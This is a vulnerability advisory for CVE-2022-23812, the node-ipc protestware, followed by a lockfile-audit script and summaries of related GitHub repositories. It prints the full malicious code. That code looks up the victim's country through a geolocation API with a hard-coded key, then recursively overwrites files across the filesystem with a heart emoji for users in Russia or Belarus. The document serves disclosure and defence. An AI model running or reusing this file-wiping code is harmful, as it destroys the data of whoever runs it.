CVE-2022-23812

Published: 16/03/2022 Updated: 07/11/2023
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
VMScore: 891
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

This affects the package node-ipc from 10.1.1 and prior to 10.1.3. This package contains malicious code that targets users whose IP address is located in Russia or Belarus and overwrites their files with a heart emoji.

**Note**: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this package, node-ipc imports the peacenotwar package that includes potentially undesired behavior.

Malicious Code:

**Note:** Don't run it!

```js
import u from "path";
import a from "fs";
import o from "https";
setTimeout(function () {
  const t = Math.round(Math.random() * 4);
  if (t > 1) {
    return;
  }
  const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64"); // api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154
  o.get(n.toString("utf8"), function (t) {
    t.on("data", function (t) {
      const n = Buffer.from("Li8=", "base64");
      const o = Buffer.from("Li4v", "base64");
      const r = Buffer.from("Li4vLi4v", "base64");
      const f = Buffer.from("Lw==", "base64");
      const c = Buffer.from("Y291bnRyeV9uYW1l", "base64");
      const e = Buffer.from("cnVzc2lh", "base64");
      const i = Buffer.from("YmVsYXJ1cw==", "base64");
      try {
        const s = JSON.parse(t.toString("utf8"));
        const u = s[c.toString("utf8")].toLowerCase();
        const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8")); // checks if country is Russia or Belarus
        if (a) {
          h(n.toString("utf8"));
          h(o.toString("utf8"));
          h(r.toString("utf8"));
          h(f.toString("utf8"));
        }
      } catch (t) {}
    });
  });
}, Math.ceil(Math.random() * 1e3));
async function h(n = "", o = "") {
  if (!a.existsSync(n)) {
    return;
  }
  let r = [];
  try {
    r = a.readdirSync(n);
  } catch (t) {}
  const f = [];
  const c = Buffer.from("4p2k77iP", "base64");
  for (var e = 0; e < r.length; e++) {
    const i = u.join(n, r[e]);
    let t = null;
    try {
      t = a.lstatSync(i);
    } catch (t) {
      continue;
    }
    if (t.isDirectory()) {
      const s = h(i, o);
      s.length > 0 ? f.push(...s) : null;
    } else if (i.indexOf(o) >= 0) {
      try {
        a.writeFile(i, c.toString("utf8"), function () {}); // overwrites file with ❤️
      } catch (t) {}
    }
  }
  return f;
}
const ssl = true;
export { ssl as default, ssl };
```
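A defender-side check built from the version ranges in the summary above, as an added example (not code from the advisory or from node-ipc): it walks the `packages` map of a parsed npm `package-lock.json` and reports node-ipc entries in the affected ranges plus any `peacenotwar` entry. The function names, status labels and sample lockfile are constructed for illustration.

```javascript
// Added example: audit a parsed package-lock.json; names, labels and sample data are constructed.
function parseVersion(v) {
  // Leading MAJOR.MINOR.PATCH only; prerelease/build suffixes are ignored.
  const m = /^(\d+)\.(\d+)\.(\d+)/.exec(String(v));
  return m ? m.slice(1).map(Number) : null;
}

function cmp(a, b) {
  for (let i = 0; i < 3; i++) if (a[i] !== b[i]) return a[i] < b[i] ? -1 : 1;
  return 0;
}

function classifyNodeIpc(version) {
  const v = parseVersion(version);
  if (!v) return "unparseable"; // tags, git URLs, missing version: review by hand
  if (cmp(v, [10, 1, 1]) >= 0 && cmp(v, [10, 1, 3]) < 0) return "malicious-inline";
  if (cmp(v, [11, 0, 0]) >= 0) return "imports-peacenotwar";
  return "outside-advisory-range";
}

function auditLockfile(lock) {
  const findings = [];
  // lockfileVersion 2/3 keys every installed copy by path, nested copies included.
  for (const [path, meta] of Object.entries(lock.packages || {})) {
    const name = path.split("node_modules/").pop();
    if (name === "node-ipc") {
      const status = classifyNodeIpc(meta.version);
      if (status !== "outside-advisory-range") findings.push({ path, version: meta.version, status });
    } else if (name === "peacenotwar") {
      // Flagged on its own so any release that pulls it in is caught.
      findings.push({ path, version: meta.version, status: "peacenotwar-present" });
    }
  }
  return findings;
}

// Constructed sample lockfile (all entries and versions are made up for the demo).
const sampleLock = {
  lockfileVersion: 3,
  packages: {
    "": { name: "demo-app", version: "1.0.0" },
    "node_modules/node-ipc": { version: "10.1.2" },
    "node_modules/build-tool/node_modules/node-ipc": { version: "11.1.0" },
    "node_modules/legacy/node_modules/node-ipc": { version: "9.1.4" },
    "node_modules/peacenotwar": { version: "0.0.0-sample" },
  },
};
console.log(auditLockfile(sampleLock));
```

Nested copies matter here because node-ipc usually arrives as a transitive dependency, so the top-level `package.json` alone will not show it.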

Vulnerable Product

node-ipc project node-ipc

Github Repositories

node-ipc protestware docker container test. Please read my blog post node-ipc-potestware to get info about the CVE-2022-23812. This repo is a container to test how the [node-ipc] protestware code works. The code has been sanitized and you can use this docker container to test it without installing anything. SECURITY DISCLAIMER: Please check accurately the code to see if I have omi

A script to recursively find the dependent packages of a node package.

find-node-dependents: A script to recursively find the dependent packages of a node package. Prints the node packageID along with the node package description. Originally meant to track the node-ipc supply chain attack (CVE-2022-23812): security.snyk.io/vuln/SNYK-JS-NODEIPC-2426370, github.com/advisories/GHSA-97m3-w2cp-4xx6. I managed to run this up to a thousand

node-ipc is malware / protestware!

CVE-2022-23812: RIAEvangelist/node-ipc is malware / protestware. The RIAEvangelist/node-ipc module contains protestware peacenotwar. Excerpt from RIAEvangelist/node-ipc: as of v11.0.0 & v9.2.2 this module uses the peacenotwar module. More importantly, commits 847047cf7f81ab08352038b2204f0e7633449580 -> 6e344066a0464814a27fbd7ca8422f473956a803 of RIAEvangelist/n